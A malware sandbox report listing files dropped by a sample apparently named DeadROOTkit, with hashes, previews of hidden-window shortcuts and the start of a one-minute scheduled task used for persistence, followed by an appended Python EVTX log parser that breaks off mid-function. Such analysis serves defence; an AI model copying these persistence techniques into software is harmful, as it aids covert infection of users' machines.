                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\Users\Public\DeadROOTkit.exe
                                                      File Type:Generic INItialization configuration [WIN]
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):3.6722687970803873
                                                      Encrypted:false
                                                      SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                      MD5:DE63D53293EBACE29F3F54832D739D40
                                                      SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                      SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                      SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                      Malicious:false
                                                      Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\Public\DeadROOTkit.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:15:44 2024, mtime=Sun Oct 13 16:15:47 2024, atime=Sun Oct 13 16:15:47 2024, length=43520, window=hide
                                                      Category:dropped
                                                      Size (bytes):981
                                                      Entropy (8bit):5.062291866025137
                                                      Encrypted:false
                                                      SSDEEP:24:83/HM62jXRcA5cAvDf2S/7tlpcG9qyFm:806gXRPb2S/RlWG0yF
                                                      MD5:DBCF2154DB50EA11951CA7A7224617B2
                                                      SHA1:79D9AC8C2DA5F62330278F2BF25B32CFB6A982C6
                                                      SHA-256:4EDE7135774108017AD069FBFFC67C6BEF1075BBD5B31500CF6A3AEEC1CB3000
                                                      SHA-512:594C45C132E526ABA6A5819C2BC816354E71FF8A5FB41FB04347537C0CB48400639412B6E475B7A93C296402108C8AB73AE60802B2E3C0C6DB299C2515E7A0EC
                                                      Malicious:false
                                                      Preview:L..................F.... ....B......n.......n..............................z.:..DG..Yr?.D..U..k0.&...&......vk.v.....-.h......0.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^MY............................%..A.p.p.D.a.t.a...B.P.1.....MY...Local.<......CW.^MY.....b......................n..L.o.c.a.l.....l.2.....MY.. .DEADRO~1.EXE..P......MY..MY............................'...D.e.a.d.R.O.O.T.k.i.t...e.x.e.......[...............-.......Z............[b......C:\Users\user\AppData\Local\DeadROOTkit.exe..'.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.D.e.a.d.R.O.O.T.k.i.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......701188...........hT..CrF.f4... .M.5......,.......hT..CrF.f4... .M.5......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                      Process:C:\Users\Public\DeadXClient.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:15:03 2024, mtime=Sun Oct 13 16:15:03 2024, atime=Sun Oct 13 16:15:03 2024, length=35840, window=hide
                                                      Category:dropped
                                                      Size (bytes):1003
                                                      Entropy (8bit):4.639017043994561
                                                      Encrypted:false
                                                      SSDEEP:12:8rTcFUlGInwlCICHqXYU2cXnYACmGlM8fCjA47z9KbgkNv9UNlpuPP44t2YZ/ele:8rTpGwwj2uh4GAUzqnvClpvqyFm
                                                      MD5:7D68C6F297EF63FB96BBBA668BB4D92E
                                                      SHA1:BB25DD90E88C5D0028D19930946C36FC28F6755C
                                                      SHA-256:C1DC6B98B4877962FBD84ECF8697CF9672D1D604B9A4C111DEE9D04A0AE84F6D
                                                      SHA-512:C7D38E1898692854FDB23C1DFCB9EEB98E21279277FB4F7734D2DE2E12E787369E402E2528E24A62D2CF07B6FED5A032FB4460E864888399DE3DCBA1CC717592
                                                      Malicious:false
                                                      Preview:L..................F.... ....*0q.....*0q.....*0q.................................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwHMY.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....MY....Public..f......O.IMY......+...............<......4..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....l.2.....MY. .DEADSV~1.EXE..P......MY.MY.....S......................q\.D.e.a.d.s.v.c.h.o.s.t...e.x.e.......N...............-.......M............[b......C:\Users\Public\Deadsvchost.exe........\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.D.e.a.d.s.v.c.h.o.s.t...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......701188...........hT..CrF.f4... .V.T..b...,.......hT..CrF.f4... .V.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?.............
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3550
                                                      Entropy (8bit):3.5749688822545456
                                                      Encrypted:false
                                                      SSDEEP:96:tXv9BdRi/enBnknNGki3igVA9ll7dhFFG+:/BdRtyNw3UrhG+
                                                      MD5:A7AD8290A05E8C5BAB44070E8C49A928
                                                      SHA1:2A841FA3D47E34CA42B095BE64C157C675F04BC4
                                                      SHA-256:D5A29ED08532604047CD965D09723224CCFE573D5F7B6720C23901077C2D411D
                                                      SHA-512:3C328EF9FFC52370AB605B4045802AC4343E5DEA222C2ECFE4D6C8F5BFD191C17F0A3189646D32D6E970DAB5DAC5435AEFF8818B11E8AFE727BF9C0A0E9441AE
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.1.3.T.1.3.:.1.5.:.4.4.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.D.e.a.d.R.O.O.T.k.i.t.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.4.-.1.0.-.1.3.T.1.3.:.1.5.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . .
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulLlXz:NllULl
                                                      MD5:F1DA3E61F1111440976EF4E0EF5A21E8
                                                      SHA1:AF82A4E680D288104C62434B40CDCA694AED53C5
                                                      SHA-256:359E0FDD777C8B0197303900DC7BC59C771D54A05D2092B85FFCC18BD2D328F1
                                                      SHA-512:A9A79A49BEC4E704BB6D712FB623BB9887996BBA057B8845EA6B86D9C76B8AEF37C07A63093ECB04B9E92E0DAF5C0DEE4D6766B8B81F0BFF7B2E6728647394A3
                                                      Malicious:false
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3376
                                                      Entropy (8bit):3.9245987954757338
                                                      Encrypted:false
                                                      SSDEEP:48:M+MLrP+sXCrPwfFRVEfWb3/OoNMOyTL3W75HSqdrSDFDSLHg:cpCrup/vOo+9LGxjoFeA
                                                      MD5:5D7BECAD418E6B30CEFE4E79522E6E62
                                                      SHA1:97657FCF3ED326587D1E37C236B20B293D116860
                                                      SHA-256:CE6DC11D93200FA5B70484C4C3C5E187869DEFBFD2CB8726D9F80EA4735BADEA
                                                      SHA-512:334FA1DA3D5051C1106E4C5F03E31944907F40C6A2A8C19CFD1F4C6E3893C4DB0A703F45FFB6D5A47811F497943F3FA5997737FDB5FD4DC5008370D933B752C4
                                                      Malicious:false
                                                      Preview:ElfChnk.................r.......s...........X...0.....`.....................................................................d..............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...............................................~...**..X...r........+v............D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 304, DIRTY
                                                      Category:dropped
                                                      Size (bytes):109960
                                                      Entropy (8bit):3.644728544853286
                                                      Encrypted:false
                                                      SSDEEP:768:3VUHiapX7xadptrDT9W849YVUHiapX7xadptrDT9W849:WHi6xadptrX9WPxHi6xadptrX9WP
                                                      MD5:B489AAB6E2037C1AB4DD93EC672AE3C8
                                                      SHA1:09AE46126646B0A589DF7210E3B297E6AFBE0B3B
                                                      SHA-256:92FEB01281F5A9465BA81892BA5E390E1B3DBECC8A7CD92A3103D848CFBD3C93
                                                      SHA-512:4046C77F12F2A32F9DDAD9715E491CFCF269F2D1633721291439F807197A5B5423D17629F9B47FC565BFDDB58E68F818BC6AB0DAE1AAD1934E4A942AEE9CC47E
                                                      Malicious:false
                                                      Preview:ElfFile.................0...................................................................................................Fo.xElfChnk.........1...............1...........p.......oc.&.......................................................................E................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.010692427789071
                                                      Encrypted:false
                                                      SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                      MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                      SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                      SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                      SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                      Malicious:false
                                                      Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):120752
                                                      Entropy (8bit):4.1819485767921085
                                                      Encrypted:false
                                                      SSDEEP:384:5VHVBhfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV8:zhfE3tXhfEh
                                                      MD5:F73371EB2FBEF228B1B9E939260B3EB4
                                                      SHA1:49D18096D0AB09E1DC94B3BB574627516785FA25
                                                      SHA-256:96C90F1FBE40E13D559F5AF476D1816981E0181E04AC9C7497C520C6DC1B9E82
                                                      SHA-512:20BB12181B6F6EE5E768E9DEEC8128DE3775B63A7E0113D7FF82085EA8E6D571F3DF2690E133D584E2D332F30B1599973CE31E44B6320D1A866B090F3B8E0E5E
                                                      Malicious:false
                                                      Preview:ElfChnk..............................................i.A....................................................................i...................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............9.t..............&...............................................................@.......X...a.!.....E..........@.9.t......&O......'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**.................t............
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.428184470415061
                                                      Encrypted:false
                                                      SSDEEP:384:shTm5mcAmNQbmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:sQlD6CL49mVpgwQFQ
                                                      MD5:00E99687608BAFDD7004EC003DF19DFF
                                                      SHA1:4451F8FE517A8F67C283B53B19561758F113BA0C
                                                      SHA-256:A4F4A270B1805AC3B0BA32BD71495D287514104DD7484C07A5F11F8E3CD97115
                                                      SHA-512:0298E0F0ED2CC65DD59E630D441A96B6944A48D212439415DBC9FF775FBA8ED785D8DD6ABF2F88B3965B846C7C056BE67F621C479BB08CDD5A7BF83D582EEF86
                                                      Malicious:false
                                                      Preview:ElfChnk..!.......!.......!.......!..........................................................................................~f..................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY
                                                      Category:dropped
                                                      Size (bytes):69448
                                                      Entropy (8bit):0.6208303949498422
                                                      Encrypted:false
                                                      SSDEEP:96:54NVaO8sMa3Z85ZML6rjjl3Z85ZuNNVaO8sMa3Z85ZML6rjjl3Z85Zu:5WV7pp8nMLivlp8nuV7pp8nMLivlp8n
                                                      MD5:03EACAFC39C0DC11A6E1446C8C652BF1
                                                      SHA1:2E0C673256693DF0E55D665972DDC63367EF9A32
                                                      SHA-256:D2008CBE7F2CABE702C1CE68A88A0A7D7479433EA7E5614BFA7349D259C0EE68
                                                      SHA-512:4919CC37C2BBE3CC015AC076BA428B2D50CA87934937922C274008F7A9593F92D98D4F5B2F725CD4A1780B48C1256C7B69F0F6008F192A80595ED6A2289589E9
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................A..>ElfChnk.....................................p.......:.9....................................................................................................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
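The one-line file(1) summary in the entry above ("MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY") is read straight out of the 128-byte EVTX file header, and the 65536-byte svchost.exe drops in this section that file(1) can only call "data" are single event-log chunks (their previews begin with ElfChnk and carry the "**" event-record signature). The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses both structures following the documented EVTX layout, verifies the CRC32 header and record checksums, walks the records of a chunk to recover record ids and write times, and reports the size, entropy and SHA-256 fields the table lists. Every byte it parses is constructed by its own build_* helpers; the function names (parse_file_header, parse_chunk, identify, sample_chunk, sample_file) are this example's, not the sandbox's.

```python
"""EVTX file-header and chunk parser. Added example, not code from the Joe Sandbox report or
the analysed sample; layout follows the documented EVTX format. All input bytes are constructed."""
import hashlib
import math
import struct
import zlib
from collections import Counter
from datetime import datetime, timedelta, timezone

FILE_SIG, CHUNK_SIG, RECORD_SIG = b"ElfFile\x00", b"ElfChnk\x00", b"\x2a\x2a\x00\x00"
FLAG_DIRTY = 0x1
CHUNK_SIZE, EPOCH = 65536, datetime(1601, 1, 1, tzinfo=timezone.utc)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the quantity the report lists as 'Entropy (8bit)'."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_file_header(buf: bytes) -> dict:
    """128-byte 'ElfFile' header; the fields file(1) prints in its one-line summary."""
    if buf[:8] != FILE_SIG or len(buf) < 128:
        raise ValueError("not an EVTX file header")
    (_first, last_chunk, next_rec, _hsize, _minor, _major,
     _bsize, chunk_count) = struct.unpack_from("<QQQIHHHH", buf, 8)
    flags, crc = struct.unpack_from("<II", buf, 120)
    return {"kind": "file",
            "chunk_count": chunk_count,          # 'N chunks'
            "last_chunk": last_chunk,            # '(no. N in use)'
            "next_record_id": next_rec,          # 'next record no. N'
            "dirty": bool(flags & FLAG_DIRTY),   # 'DIRTY': header not flushed by a clean close
            "header_crc_ok": crc == zlib.crc32(buf[:120]) & 0xFFFFFFFF}


def parse_chunk(buf: bytes) -> dict:
    """One 64 KiB 'ElfChnk' chunk: header, both CRC32 checks and the record walk. Works on a
    bare chunk with no file header, which is what the 65536-byte 'data' drops are."""
    if buf[:8] != CHUNK_SIG or len(buf) < 512:
        raise ValueError("not an EVTX chunk")
    (_fnum, _lnum, first_id, last_id, _hsize, _last_off,
     free_off, rec_crc) = struct.unpack_from("<QQQQIIII", buf, 8)
    crc = struct.unpack_from("<I", buf, 124)[0]
    data_ok = 512 <= free_off <= len(buf)        # tolerate a truncated trailing chunk
    records, off = [], 512
    while data_ok and off + 28 <= free_off and buf[off:off + 4] == RECORD_SIG:
        size, rec_id, written = struct.unpack_from("<IQQ", buf, off + 4)
        if size < 28 or off + size > free_off:   # corrupt or truncated record: stop here
            break
        records.append((rec_id, (EPOCH + timedelta(microseconds=written // 10)).isoformat(), size))
        off += size
    return {"kind": "chunk", "record_ids": (first_id, last_id), "records": records,
            "header_crc_ok": crc == zlib.crc32(buf[:120] + buf[128:512]) & 0xFFFFFFFF,
            "records_crc_ok": data_ok and rec_crc == zlib.crc32(buf[512:free_off]) & 0xFFFFFFFF}


def identify(buf: bytes) -> dict:
    """Dispatch on signature and add the size/entropy/SHA-256 fields the report table lists."""
    if buf.startswith(FILE_SIG):
        info = parse_file_header(buf)            # chunks follow the 4 KiB header block
        info["chunks"] = [parse_chunk(buf[o:o + CHUNK_SIZE]) for o in range(4096, len(buf), CHUNK_SIZE)
                          if buf[o:o + 8] == CHUNK_SIG and len(buf) - o >= 512]
    elif buf.startswith(CHUNK_SIG):
        info = parse_chunk(buf)
    else:
        info = {"kind": "data"}
    info.update(size=len(buf), entropy=round(shannon_entropy(buf), 3),
                sha256=hashlib.sha256(buf).hexdigest())
    return info


# Constructed sample data (this example's own, not the files dropped in the report)
def build_file_header(chunk_count=1, last_chunk=0, next_rec=2, flags=FLAG_DIRTY) -> bytes:
    body = FILE_SIG + struct.pack("<QQQIHHHH", 0, last_chunk, next_rec, 128, 1, 3, 4096, chunk_count)
    body = body.ljust(120, b"\x00")
    return body + struct.pack("<II", flags, zlib.crc32(body) & 0xFFFFFFFF)


def build_record(rec_id: int, written: datetime, payload: bytes) -> bytes:
    d = written - EPOCH                          # exact integer FILETIME, no float rounding
    ft = (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10
    size = 28 + len(payload)
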